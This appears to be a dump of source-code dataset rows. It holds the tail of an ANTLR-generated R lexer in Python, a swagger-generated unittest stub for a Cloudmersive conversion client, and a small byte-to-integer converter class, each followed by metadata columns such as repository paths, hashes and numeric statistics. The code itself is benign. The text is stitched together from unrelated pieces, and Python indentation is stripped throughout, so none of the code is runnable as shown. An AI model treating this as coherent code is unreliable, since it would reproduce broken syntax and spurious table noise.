buf.write("E\u01e1\nE\fE\16E\u01e4\13E\3E\3E\3E\3E\7E\u01ea\nE\f")
buf.write("E\16E\u01ed\13E\5E\u01ef\nE\3F\3F\3G\3G\7G\u01f5\nG\f")
buf.write("G\16G\u01f8\13G\3G\3G\3H\3H\7H\u01fe\nH\fH\16H\u0201\13")
buf.write("H\3H\5H\u0204\nH\3H\3H\3H\3H\3I\5I\u020b\nI\3I\3I\3J\6")
buf.write("J\u0210\nJ\rJ\16J\u0211\3J\3J\7\u0197\u01a0\u01a9\u01f6")
buf.write("\u01ff\2K\3\3\5\4\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25")
buf.write("\f\27\r\31\16\33\17\35\20\37\21!\22#\23%\24\'\25)\26+")
buf.write("\27-\30/\31\61\32\63\33\65\34\67\359\36;\37= ?!A\"C#E")
buf.write("$G%I&K\'M(O)Q*S+U,W-Y.[/]\60_\61a\62c\63e\64g\65i\66k")
buf.write("\67m8o9q:s;u\2w<y\2{\2}=\177>\u0081\2\u0083\2\u0085\2")
buf.write("\u0087\2\u0089?\u008b\2\u008d@\u008f\2\u0091A\u0093B\3")
buf.write("\2\17\4\2ZZzz\4\2NNnn\5\2\62;CHch\4\2GGgg\4\2--//\4\2")
buf.write("$$^^\4\2))^^\13\2$$))^^cdhhppttvvxx\3\2\62\65\3\2\629")
buf.write("\4\2\60\60aa\4\2C\\c|\5\2\13\13\16\16\"\"\2\u023a\2\3")
buf.write("\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3\2\2\2\2\13\3\2")
buf.write("\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2\2\2\2\23\3\2\2")
buf.write("\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2\2\2\33\3\2\2\2")
buf.write("\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2#\3\2\2\2\2%\3")
buf.write("\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2")
buf.write("/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65\3\2\2\2\2\67")
buf.write("\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2\2?\3\2\2\2\2")
buf.write("A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2\2\2I\3\2\2\2")
buf.write("\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2\2\2\2S\3\2\2")
buf.write("\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3\2\2\2\2]\3\2")
buf.write("\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2\2e\3\2\2\2\2g\3")
buf.write("\2\2\2\2i\3\2\2\2\2k\3\2\2\2\2m\3\2\2\2\2o\3\2\2\2\2q")
buf.write("\3\2\2\2\2s\3\2\2\2\2w\3\2\2\2\2}\3\2\2\2\2\177\3\2\2")
buf.write("\2\2\u0089\3\2\2\2\2\u008d\3\2\2\2\2\u008f\3\2\2\2\2\u0091")
buf.write("\3\2\2\2\2\u0093\3\2\2\2\3\u0095\3\2\2\2\5\u0097\3\2\2")
buf.write("\2\7\u009a\3\2\2\2\t\u009c\3\2\2\2\13\u009e\3\2\2\2\r")
buf.write("\u00a1\3\2\2\2\17\u00a5\3\2\2\2\21\u00a7\3\2\2\2\23\u00a9")
buf.write("\3\2\2\2\25\u00ab\3\2\2\2\27\u00ad\3\2\2\2\31\u00af\3")
buf.write("\2\2\2\33\u00b1\3\2\2\2\35\u00b3\3\2\2\2\37\u00b5\3\2")
buf.write("\2\2!\u00b7\3\2\2\2#\u00ba\3\2\2\2%\u00bc\3\2\2\2\'\u00bf")
buf.write("\3\2\2\2)\u00c2\3\2\2\2+\u00c5\3\2\2\2-\u00c7\3\2\2\2")
buf.write("/\u00c9\3\2\2\2\61\u00cc\3\2\2\2\63\u00ce\3\2\2\2\65\u00d1")
buf.write("\3\2\2\2\67\u00d3\3\2\2\29\u00d6\3\2\2\2;\u00da\3\2\2")
buf.write("\2=\u00dc\3\2\2\2?\u00df\3\2\2\2A\u00e3\3\2\2\2C\u00e6")
buf.write("\3\2\2\2E\u00ef\3\2\2\2G\u00f1\3\2\2\2I\u00f3\3\2\2\2")
buf.write("K\u00f5\3\2\2\2M\u00f7\3\2\2\2O\u00fa\3\2\2\2Q\u00ff\3")
buf.write("\2\2\2S\u0103\3\2\2\2U\u0106\3\2\2\2W\u010c\3\2\2\2Y\u0113")
buf.write("\3\2\2\2[\u0115\3\2\2\2]\u011a\3\2\2\2_\u0120\3\2\2\2")
buf.write("a\u0125\3\2\2\2c\u0128\3\2\2\2e\u012c\3\2\2\2g\u0130\3")
buf.write("\2\2\2i\u0135\3\2\2\2k\u013b\3\2\2\2m\u013d\3\2\2\2o\u0141")
buf.write("\3\2\2\2q\u0143\3\2\2\2s\u014e\3\2\2\2u\u0155\3\2\2\2")
buf.write("w\u0180\3\2\2\2y\u0182\3\2\2\2{\u0184\3\2\2\2}\u0190\3")
buf.write("\2\2\2\177\u01ad\3\2\2\2\u0081\u01b4\3\2\2\2\u0083\u01c6")
buf.write("\3\2\2\2\u0085\u01d1\3\2\2\2\u0087\u01d3\3\2\2\2\u0089")
buf.write("\u01ee\3\2\2\2\u008b\u01f0\3\2\2\2\u008d\u01f2\3\2\2\2")
buf.write("\u008f\u01fb\3\2\2\2\u0091\u020a\3\2\2\2\u0093\u020f\3")
buf.write("\2\2\2\u0095\u0096\7=\2\2\u0096\4\3\2\2\2\u0097\u0098")
buf.write("\7]\2\2\u0098\u0099\7]\2\2\u0099\6\3\2\2\2\u009a\u009b")
buf.write("\7_\2\2\u009b\b\3\2\2\2\u009c\u009d\7]\2\2\u009d\n\3\2")
buf.write("\2\2\u009e\u009f\7<\2\2\u009f\u00a0\7<\2\2\u00a0\f\3\2")
buf.write("\2\2\u00a1\u00a2\7<\2\2\u00a2\u00a3\7<\2\2\u00a3\u00a4")
buf.write("\7<\2\2\u00a4\16\3\2\2\2\u00a5\u00a6\7&\2\2\u00a6\20\3")
buf.write("\2\2\2\u00a7\u00a8\7B\2\2\u00a8\22\3\2\2\2\u00a9\u00aa")
buf.write("\7`\2\2\u00aa\24\3\2\2\2\u00ab\u00ac\7/\2\2\u00ac\26\3")
buf.write("\2\2\2\u00ad\u00ae\7-\2\2\u00ae\30\3\2\2\2\u00af\u00b0")
buf.write("\7<\2\2\u00b0\32\3\2\2\2\u00b1\u00b2\7,\2\2\u00b2\34\3")
buf.write("\2\2\2\u00b3\u00b4\7\61\2\2\u00b4\36\3\2\2\2\u00b5\u00b6")
buf.write("\7@\2\2\u00b6 \3\2\2\2\u00b7\u00b8\7@\2\2\u00b8\u00b9")
buf.write("\7?\2\2\u00b9\"\3\2\2\2\u00ba\u00bb\7>\2\2\u00bb$\3\2")
buf.write("\2\2\u00bc\u00bd\7>\2\2\u00bd\u00be\7?\2\2\u00be&\3\2")
buf.write("\2\2\u00bf\u00c0\7?\2\2\u00c0\u00c1\7?\2\2\u00c1(\3\2")
buf.write("\2\2\u00c2\u00c3\7#\2\2\u00c3\u00c4\7?\2\2\u00c4*\3\2")
buf.write("\2\2\u00c5\u00c6\7#\2\2\u00c6,\3\2\2\2\u00c7\u00c8\7(")
buf.write("\2\2\u00c8.\3\2\2\2\u00c9\u00ca\7(\2\2\u00ca\u00cb\7(")
buf.write("\2\2\u00cb\60\3\2\2\2\u00cc\u00cd\7~\2\2\u00cd\62\3\2")
buf.write("\2\2\u00ce\u00cf\7~\2\2\u00cf\u00d0\7~\2\2\u00d0\64\3")
buf.write("\2\2\2\u00d1\u00d2\7\u0080\2\2\u00d2\66\3\2\2\2\u00d3")
buf.write("\u00d4\7>\2\2\u00d4\u00d5\7/\2\2\u00d58\3\2\2\2\u00d6")
buf.write("\u00d7\7>\2\2\u00d7\u00d8\7>\2\2\u00d8\u00d9\7/\2\2\u00d9")
buf.write(":\3\2\2\2\u00da\u00db\7?\2\2\u00db<\3\2\2\2\u00dc\u00dd")
buf.write("\7/\2\2\u00dd\u00de\7@\2\2\u00de>\3\2\2\2\u00df\u00e0")
buf.write("\7/\2\2\u00e0\u00e1\7@\2\2\u00e1\u00e2\7@\2\2\u00e2@\3")
buf.write("\2\2\2\u00e3\u00e4\7<\2\2\u00e4\u00e5\7?\2\2\u00e5B\3")
buf.write("\2\2\2\u00e6\u00e7\7h\2\2\u00e7\u00e8\7w\2\2\u00e8\u00e9")
buf.write("\7p\2\2\u00e9\u00ea\7e\2\2\u00ea\u00eb\7v\2\2\u00eb\u00ec")
buf.write("\7k\2\2\u00ec\u00ed\7q\2\2\u00ed\u00ee\7p\2\2\u00eeD\3")
buf.write("\2\2\2\u00ef\u00f0\7*\2\2\u00f0F\3\2\2\2\u00f1\u00f2\7")
buf.write("+\2\2\u00f2H\3\2\2\2\u00f3\u00f4\7}\2\2\u00f4J\3\2\2\2")
buf.write("\u00f5\u00f6\7\177\2\2\u00f6L\3\2\2\2\u00f7\u00f8\7k\2")
buf.write("\2\u00f8\u00f9\7h\2\2\u00f9N\3\2\2\2\u00fa\u00fb\7g\2")
buf.write("\2\u00fb\u00fc\7n\2\2\u00fc\u00fd\7u\2\2\u00fd\u00fe\7")
buf.write("g\2\2\u00feP\3\2\2\2\u00ff\u0100\7h\2\2\u0100\u0101\7")
buf.write("q\2\2\u0101\u0102\7t\2\2\u0102R\3\2\2\2\u0103\u0104\7")
buf.write("k\2\2\u0104\u0105\7p\2\2\u0105T\3\2\2\2\u0106\u0107\7")
buf.write("y\2\2\u0107\u0108\7j\2\2\u0108\u0109\7k\2\2\u0109\u010a")
buf.write("\7n\2\2\u010a\u010b\7g\2\2\u010bV\3\2\2\2\u010c\u010d")
buf.write("\7t\2\2\u010d\u010e\7g\2\2\u010e\u010f\7r\2\2\u010f\u0110")
buf.write("\7g\2\2\u0110\u0111\7c\2\2\u0111\u0112\7v\2\2\u0112X\3")
buf.write("\2\2\2\u0113\u0114\7A\2\2\u0114Z\3\2\2\2\u0115\u0116\7")
buf.write("p\2\2\u0116\u0117\7g\2\2\u0117\u0118\7z\2\2\u0118\u0119")
buf.write("\7v\2\2\u0119\\\3\2\2\2\u011a\u011b\7d\2\2\u011b\u011c")
buf.write("\7t\2\2\u011c\u011d\7g\2\2\u011d\u011e\7c\2\2\u011e\u011f")
buf.write("\7m\2\2\u011f^\3\2\2\2\u0120\u0121\7P\2\2\u0121\u0122")
buf.write("\7W\2\2\u0122\u0123\7N\2\2\u0123\u0124\7N\2\2\u0124`\3")
buf.write("\2\2\2\u0125\u0126\7P\2\2\u0126\u0127\7C\2\2\u0127b\3")
buf.write("\2\2\2\u0128\u0129\7K\2\2\u0129\u012a\7p\2\2\u012a\u012b")
buf.write("\7h\2\2\u012bd\3\2\2\2\u012c\u012d\7P\2\2\u012d\u012e")
buf.write("\7c\2\2\u012e\u012f\7P\2\2\u012ff\3\2\2\2\u0130\u0131")
buf.write("\7V\2\2\u0131\u0132\7T\2\2\u0132\u0133\7W\2\2\u0133\u0134")
buf.write("\7G\2\2\u0134h\3\2\2\2\u0135\u0136\7H\2\2\u0136\u0137")
buf.write("\7C\2\2\u0137\u0138\7N\2\2\u0138\u0139\7U\2\2\u0139\u013a")
buf.write("\7G\2\2\u013aj\3\2\2\2\u013b\u013c\7.\2\2\u013cl\3\2\2")
buf.write("\2\u013d\u013e\7\60\2\2\u013e\u013f\7\60\2\2\u013f\u0140")
buf.write("\7\60\2\2\u0140n\3\2\2\2\u0141\u0142\7\60\2\2\u0142p\3")
buf.write("\2\2\2\u0143\u0144\7\62\2\2\u0144\u0146\t\2\2\2\u0145")
buf.write("\u0147\5u;\2\u0146\u0145\3\2\2\2\u0147\u0148\3\2\2\2\u0148")
buf.write("\u0146\3\2\2\2\u0148\u0149\3\2\2\2\u0149\u014b\3\2\2\2")
buf.write("\u014a\u014c\t\3\2\2\u014b\u014a\3\2\2\2\u014b\u014c\3")
buf.write("\2\2\2\u014cr\3\2\2\2\u014d\u014f\5y=\2\u014e\u014d\3")
buf.write("\2\2\2\u014f\u0150\3\2\2\2\u0150\u014e\3\2\2\2\u0150\u0151")
buf.write("\3\2\2\2\u0151\u0153\3\2\2\2\u0152\u0154\t\3\2\2\u0153")
buf.write("\u0152\3\2\2\2\u0153\u0154\3\2\2\2\u0154t\3\2\2\2\u0155")
buf.write("\u0156\t\4\2\2\u0156v\3\2\2\2\u0157\u0159\5y=\2\u0158")
buf.write("\u0157\3\2\2\2\u0159\u015a\3\2\2\2\u015a\u0158\3\2\2\2")
buf.write("\u015a\u015b\3\2\2\2\u015b\u015c\3\2\2\2\u015c\u0160\7")
buf.write("\60\2\2\u015d\u015f\5y=\2\u015e\u015d\3\2\2\2\u015f\u0162")
buf.write("\3\2\2\2\u0160\u015e\3\2\2\2\u0160\u0161\3\2\2\2\u0161")
buf.write("\u0164\3\2\2\2\u0162\u0160\3\2\2\2\u0163\u0165\5{>\2\u0164")
buf.write("\u0163\3\2\2\2\u0164\u0165\3\2\2\2\u0165\u0167\3\2\2\2")
buf.write("\u0166\u0168\t\3\2\2\u0167\u0166\3\2\2\2\u0167\u0168\3")
buf.write("\2\2\2\u0168\u0181\3\2\2\2\u0169\u016b\5y=\2\u016a\u0169")
buf.write("\3\2\2\2\u016b\u016c\3\2\2\2\u016c\u016a\3\2\2\2\u016c")
buf.write("\u016d\3\2\2\2\u016d\u016f\3\2\2\2\u016e\u0170\5{>\2\u016f")
buf.write("\u016e\3\2\2\2\u016f\u0170\3\2\2\2\u0170\u0172\3\2\2\2")
buf.write("\u0171\u0173\t\3\2\2\u0172\u0171\3\2\2\2\u0172\u0173\3")
buf.write("\2\2\2\u0173\u0181\3\2\2\2\u0174\u0176\7\60\2\2\u0175")
buf.write("\u0177\5y=\2\u0176\u0175\3\2\2\2\u0177\u0178\3\2\2\2\u0178")
buf.write("\u0176\3\2\2\2\u0178\u0179\3\2\2\2\u0179\u017b\3\2\2\2")
buf.write("\u017a\u017c\5{>\2\u017b\u017a\3\2\2\2\u017b\u017c\3\2")
buf.write("\2\2\u017c\u017e\3\2\2\2\u017d\u017f\t\3\2\2\u017e\u017d")
buf.write("\3\2\2\2\u017e\u017f\3\2\2\2\u017f\u0181\3\2\2\2\u0180")
buf.write("\u0158\3\2\2\2\u0180\u016a\3\2\2\2\u0180\u0174\3\2\2\2")
buf.write("\u0181x\3\2\2\2\u0182\u0183\4\62;\2\u0183z\3\2\2\2\u0184")
buf.write("\u0186\t\5\2\2\u0185\u0187\t\6\2\2\u0186\u0185\3\2\2\2")
buf.write("\u0186\u0187\3\2\2\2\u0187\u0188\3\2\2\2\u0188\u0189\5")
buf.write("s:\2\u0189|\3\2\2\2\u018a\u018b\5s:\2\u018b\u018c\7k\2")
buf.write("\2\u018c\u0191\3\2\2\2\u018d\u018e\5w<\2\u018e\u018f\7")
buf.write("k\2\2\u018f\u0191\3\2\2\2\u0190\u018a\3\2\2\2\u0190\u018d")
buf.write("\3\2\2\2\u0191~\3\2\2\2\u0192\u0197\7$\2\2\u0193\u0196")
buf.write("\5\u0081A\2\u0194\u0196\n\7\2\2\u0195\u0193\3\2\2\2\u0195")
buf.write("\u0194\3\2\2\2\u0196\u0199\3\2\2\2\u0197\u0198\3\2\2\2")
buf.write("\u0197\u0195\3\2\2\2\u0198\u019a\3\2\2\2\u0199\u0197\3")
buf.write("\2\2\2\u019a\u01ae\7$\2\2\u019b\u01a0\7)\2\2\u019c\u019f")
buf.write("\5\u0081A\2\u019d\u019f\n\b\2\2\u019e\u019c\3\2\2\2\u019e")
buf.write("\u019d\3\2\2\2\u019f\u01a2\3\2\2\2\u01a0\u01a1\3\2\2\2")
buf.write("\u01a0\u019e\3\2\2\2\u01a1\u01a3\3\2\2\2\u01a2\u01a0\3")
buf.write("\2\2\2\u01a3\u01ae\7)\2\2\u01a4\u01a9\7b\2\2\u01a5\u01a8")
buf.write("\5\u0081A\2\u01a6\u01a8\n\b\2\2\u01a7\u01a5\3\2\2\2\u01a7")
buf.write("\u01a6\3\2\2\2\u01a8\u01ab\3\2\2\2\u01a9\u01aa\3\2\2\2")
buf.write("\u01a9\u01a7\3\2\2\2\u01aa\u01ac\3\2\2\2\u01ab\u01a9\3")
buf.write("\2\2\2\u01ac\u01ae\7b\2\2\u01ad\u0192\3\2\2\2\u01ad\u019b")
buf.write("\3\2\2\2\u01ad\u01a4\3\2\2\2\u01ae\u0080\3\2\2\2\u01af")
buf.write("\u01b0\7^\2\2\u01b0\u01b5\t\t\2\2\u01b1\u01b5\5\u0083")
buf.write("B\2\u01b2\u01b5\5\u0087D\2\u01b3\u01b5\5\u0085C\2\u01b4")
buf.write("\u01af\3\2\2\2\u01b4\u01b1\3\2\2\2\u01b4\u01b2\3\2\2\2")
buf.write("\u01b4\u01b3\3\2\2\2\u01b5\u0082\3\2\2\2\u01b6\u01b7\7")
buf.write("^\2\2\u01b7\u01b8\7w\2\2\u01b8\u01b9\5u;\2\u01b9\u01ba")
buf.write("\5u;\2\u01ba\u01bb\5u;\2\u01bb\u01bc\5u;\2\u01bc\u01c7")
buf.write("\3\2\2\2\u01bd\u01be\7^\2\2\u01be\u01bf\7w\2\2\u01bf\u01c0")
buf.write("\7}\2\2\u01c0\u01c1\5u;\2\u01c1\u01c2\5u;\2\u01c2\u01c3")
buf.write("\5u;\2\u01c3\u01c4\5u;\2\u01c4\u01c5\7\177\2\2\u01c5\u01c7")
buf.write("\3\2\2\2\u01c6\u01b6\3\2\2\2\u01c6\u01bd\3\2\2\2\u01c7")
buf.write("\u0084\3\2\2\2\u01c8\u01c9\7^\2\2\u01c9\u01ca\t\n\2\2")
buf.write("\u01ca\u01cb\t\13\2\2\u01cb\u01d2\t\13\2\2\u01cc\u01cd")
buf.write("\7^\2\2\u01cd\u01ce\t\13\2\2\u01ce\u01d2\t\13\2\2\u01cf")
buf.write("\u01d0\7^\2\2\u01d0\u01d2\t\13\2\2\u01d1\u01c8\3\2\2\2")
buf.write("\u01d1\u01cc\3\2\2\2\u01d1\u01cf\3\2\2\2\u01d2\u0086\3")
buf.write("\2\2\2\u01d3\u01d4\7^\2\2\u01d4\u01d6\5u;\2\u01d5\u01d7")
buf.write("\5u;\2\u01d6\u01d5\3\2\2\2\u01d6\u01d7\3\2\2\2\u01d7\u0088")
buf.write("\3\2\2\2\u01d8\u01db\7\60\2\2\u01d9\u01dc\5\u008bF\2\u01da")
buf.write("\u01dc\t\f\2\2\u01db\u01d9\3\2\2\2\u01db\u01da\3\2\2\2")
buf.write("\u01dc\u01e2\3\2\2\2\u01dd\u01e1\5\u008bF\2\u01de\u01e1")
buf.write("\5y=\2\u01df\u01e1\t\f\2\2\u01e0\u01dd\3\2\2\2\u01e0\u01de")
buf.write("\3\2\2\2\u01e0\u01df\3\2\2\2\u01e1\u01e4\3\2\2\2\u01e2")
buf.write("\u01e0\3\2\2\2\u01e2\u01e3\3\2\2\2\u01e3\u01ef\3\2\2\2")
buf.write("\u01e4\u01e2\3\2\2\2\u01e5\u01eb\5\u008bF\2\u01e6\u01ea")
buf.write("\5\u008bF\2\u01e7\u01ea\5y=\2\u01e8\u01ea\t\f\2\2\u01e9")
buf.write("\u01e6\3\2\2\2\u01e9\u01e7\3\2\2\2\u01e9\u01e8\3\2\2\2")
buf.write("\u01ea\u01ed\3\2\2\2\u01eb\u01e9\3\2\2\2\u01eb\u01ec\3")
buf.write("\2\2\2\u01ec\u01ef\3\2\2\2\u01ed\u01eb\3\2\2\2\u01ee\u01d8")
buf.write("\3\2\2\2\u01ee\u01e5\3\2\2\2\u01ef\u008a\3\2\2\2\u01f0")
buf.write("\u01f1\t\r\2\2\u01f1\u008c\3\2\2\2\u01f2\u01f6\7\'\2\2")
buf.write("\u01f3\u01f5\13\2\2\2\u01f4\u01f3\3\2\2\2\u01f5\u01f8")
buf.write("\3\2\2\2\u01f6\u01f7\3\2\2\2\u01f6\u01f4\3\2\2\2\u01f7")
buf.write("\u01f9\3\2\2\2\u01f8\u01f6\3\2\2\2\u01f9\u01fa\7\'\2\2")
buf.write("\u01fa\u008e\3\2\2\2\u01fb\u01ff\7%\2\2\u01fc\u01fe\13")
buf.write("\2\2\2\u01fd\u01fc\3\2\2\2\u01fe\u0201\3\2\2\2\u01ff\u0200")
buf.write("\3\2\2\2\u01ff\u01fd\3\2\2\2\u0200\u0203\3\2\2\2\u0201")
buf.write("\u01ff\3\2\2\2\u0202\u0204\7\17\2\2\u0203\u0202\3\2\2")
buf.write("\2\u0203\u0204\3\2\2\2\u0204\u0205\3\2\2\2\u0205\u0206")
buf.write("\7\f\2\2\u0206\u0207\3\2\2\2\u0207\u0208\bH\2\2\u0208")
buf.write("\u0090\3\2\2\2\u0209\u020b\7\17\2\2\u020a\u0209\3\2\2")
buf.write("\2\u020a\u020b\3\2\2\2\u020b\u020c\3\2\2\2\u020c\u020d")
buf.write("\7\f\2\2\u020d\u0092\3\2\2\2\u020e\u0210\t\16\2\2\u020f")
buf.write("\u020e\3\2\2\2\u0210\u0211\3\2\2\2\u0211\u020f\3\2\2\2")
buf.write("\u0211\u0212\3\2\2\2\u0212\u0213\3\2\2\2\u0213\u0214\b")
buf.write("J\3\2\u0214\u0094\3\2\2\2*\2\u0148\u014b\u0150\u0153\u015a")
buf.write("\u0160\u0164\u0167\u016c\u016f\u0172\u0178\u017b\u017e")
buf.write("\u0180\u0186\u0190\u0195\u0197\u019e\u01a0\u01a7\u01a9")
buf.write("\u01ad\u01b4\u01c6\u01d1\u01d6\u01db\u01e0\u01e2\u01e9")
buf.write("\u01eb\u01ee\u01f6\u01ff\u0203\u020a\u0211\4\tA\2\b\2")
buf.write("\2")
return buf.getvalue()
class RLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
T__1 = 2
T__2 = 3
T__3 = 4
T__4 = 5
T__5 = 6
T__6 = 7
T__7 = 8
T__8 = 9
T__9 = 10
T__10 = 11
T__11 = 12
T__12 = 13
T__13 = 14
T__14 = 15
T__15 = 16
T__16 = 17
T__17 = 18
T__18 = 19
T__19 = 20
T__20 = 21
T__21 = 22
T__22 = 23
T__23 = 24
T__24 = 25
T__25 = 26
T__26 = 27
T__27 = 28
T__28 = 29
T__29 = 30
T__30 = 31
T__31 = 32
T__32 = 33
T__33 = 34
T__34 = 35
T__35 = 36
T__36 = 37
T__37 = 38
T__38 = 39
T__39 = 40
T__40 = 41
T__41 = 42
T__42 = 43
T__43 = 44
T__44 = 45
T__45 = 46
T__46 = 47
T__47 = 48
T__48 = 49
T__49 = 50
T__50 = 51
T__51 = 52
T__52 = 53
T__53 = 54
T__54 = 55
HEX = 56
INT = 57
FLOAT = 58
COMPLEX = 59
STRING = 60
ID = 61
USER_OP = 62
NL = 63
WS = 64
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"';'", "'[['", "']'", "'['", "'::'", "':::'", "'$'", "'@'",
"'^'", "'-'", "'+'", "':'", "'*'", "'/'", "'>'", "'>='", "'<'",
"'<='", "'=='", "'!='", "'!'", "'&'", "'&&'", "'|'", "'||'",
"'~'", "'<-'", "'<<-'", "'='", "'->'", "'->>'", "':='", "'function'",
"'('", "')'", "'{'", "'}'", "'if'", "'else'", "'for'", "'in'",
"'while'", "'repeat'", "'?'", "'next'", "'break'", "'NULL'",
"'NA'", "'Inf'", "'NaN'", "'TRUE'", "'FALSE'", "','", "'...'",
"'.'" ]
symbolicNames = [ "<INVALID>",
"HEX", "INT", "FLOAT", "COMPLEX", "STRING", "ID", "USER_OP",
"NL", "WS" ]
ruleNames = [ "T__0", "T__1", "T__2", "T__3", "T__4", "T__5", "T__6",
"T__7", "T__8", "T__9", "T__10", "T__11", "T__12", "T__13",
"T__14", "T__15", "T__16", "T__17", "T__18", "T__19",
"T__20", "T__21", "T__22", "T__23", "T__24", "T__25",
"T__26", "T__27", "T__28", "T__29", "T__30", "T__31",
"T__32", "T__33", "T__34", "T__35", "T__36", "T__37",
"T__38", "T__39", "T__40", "T__41", "T__42", "T__43",
"T__44", "T__45", "T__46", "T__47", "T__48", "T__49",
"T__50", "T__51", "T__52", "T__53", "T__54", "HEX", "INT",
"HEXDIGIT", "FLOAT", "DIGIT", "EXP", "COMPLEX", "STRING",
"ESC", "UNICODE_ESCAPE", "OCTAL_ESCAPE", "HEX_ESCAPE",
"ID", "LETTER", "USER_OP", "COMMENT", "NL", "WS" ]
grammarFileName = "R.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.8")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
| 59.4
| 103
| 0.55592
| 5,009
| 21,978
| 2.390098
| 0.148732
| 0.148012
| 0.088707
| 0.096225
| 0.239225
| 0.142082
| 0.053625
| 0.041597
| 0.035416
| 0.030154
| 0
| 0.356833
| 0.151288
| 21,978
| 369
| 104
| 59.560976
| 0.284994
| 0.004277
| 0
| 0
| 1
| 0.287749
| 0.632221
| 0.594973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005698
| false
| 0
| 0.011396
| 0
| 0.22792
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
62b168a87b111cdc369e35fac01c3a0832840152
| 1,013
|
py
|
Python
|
test/test_get_docx_tables_request.py
|
Cloudmersive/Cloudmersive.APIClient.Python.Convert
|
dba2fe7257229ebdacd266531b3724552c651009
|
[
"Apache-2.0"
] | 3
|
2018-07-25T23:04:34.000Z
|
2021-08-10T16:43:10.000Z
|
test/test_get_docx_tables_request.py
|
Cloudmersive/Cloudmersive.APIClient.Python.Convert
|
dba2fe7257229ebdacd266531b3724552c651009
|
[
"Apache-2.0"
] | 3
|
2020-11-23T10:46:48.000Z
|
2021-12-30T14:09:34.000Z
|
test/test_get_docx_tables_request.py
|
Cloudmersive/Cloudmersive.APIClient.Python.Convert
|
dba2fe7257229ebdacd266531b3724552c651009
|
[
"Apache-2.0"
] | 2
|
2020-01-07T09:48:01.000Z
|
2020-11-23T10:47:00.000Z
|
# coding: utf-8
"""
convertapi
Convert API lets you effortlessly convert file formats and types. # noqa: E501
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import cloudmersive_convert_api_client
from cloudmersive_convert_api_client.models.get_docx_tables_request import GetDocxTablesRequest # noqa: E501
from cloudmersive_convert_api_client.rest import ApiException
class TestGetDocxTablesRequest(unittest.TestCase):
"""GetDocxTablesRequest unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGetDocxTablesRequest(self):
"""Test GetDocxTablesRequest"""
# FIXME: construct object with mandatory attributes with example values
# model = cloudmersive_convert_api_client.models.get_docx_tables_request.GetDocxTablesRequest() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 24.707317
| 117
| 0.741362
| 113
| 1,013
| 6.371681
| 0.575221
| 0.069444
| 0.122222
| 0.155556
| 0.2
| 0.15
| 0.15
| 0.15
| 0.15
| 0
| 0
| 0.013366
| 0.187562
| 1,013
| 40
| 118
| 25.325
| 0.861482
| 0.443238
| 0
| 0.214286
| 1
| 0
| 0.015326
| 0
| 0
| 0
| 0
| 0.025
| 0
| 1
| 0.214286
| false
| 0.214286
| 0.357143
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
62e6229f71aaf5eee528859098ed00ea62f05476
| 170
|
py
|
Python
|
source/script/FASelector_SRC/Utils/Converter.py
|
onsoim/FuzzBuilderEx
|
d0e8bada27677a0f676e92dc48aaa764ba679508
|
[
"Apache-2.0"
] | 6
|
2021-03-27T06:07:01.000Z
|
2022-03-29T04:54:03.000Z
|
source/script/FASelector_SRC/Utils/Converter.py
|
onsoim/FuzzBuilderEx
|
d0e8bada27677a0f676e92dc48aaa764ba679508
|
[
"Apache-2.0"
] | 4
|
2021-03-24T00:10:59.000Z
|
2022-03-28T13:41:28.000Z
|
source/script/FASelector_SRC/Utils/Converter.py
|
onsoim/FuzzBuilderEx
|
d0e8bada27677a0f676e92dc48aaa764ba679508
|
[
"Apache-2.0"
] | 2
|
2021-04-05T06:22:20.000Z
|
2021-10-01T21:07:18.000Z
|
class CONVERTER:
def __init__(self, endian):
self.endian = endian
def bytes2int(self, bytes):
return int.from_bytes(bytes, byteorder=self.endian)
| 28.333333
| 59
| 0.676471
| 21
| 170
| 5.238095
| 0.571429
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.223529
| 170
| 6
| 59
| 28.333333
| 0.825758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
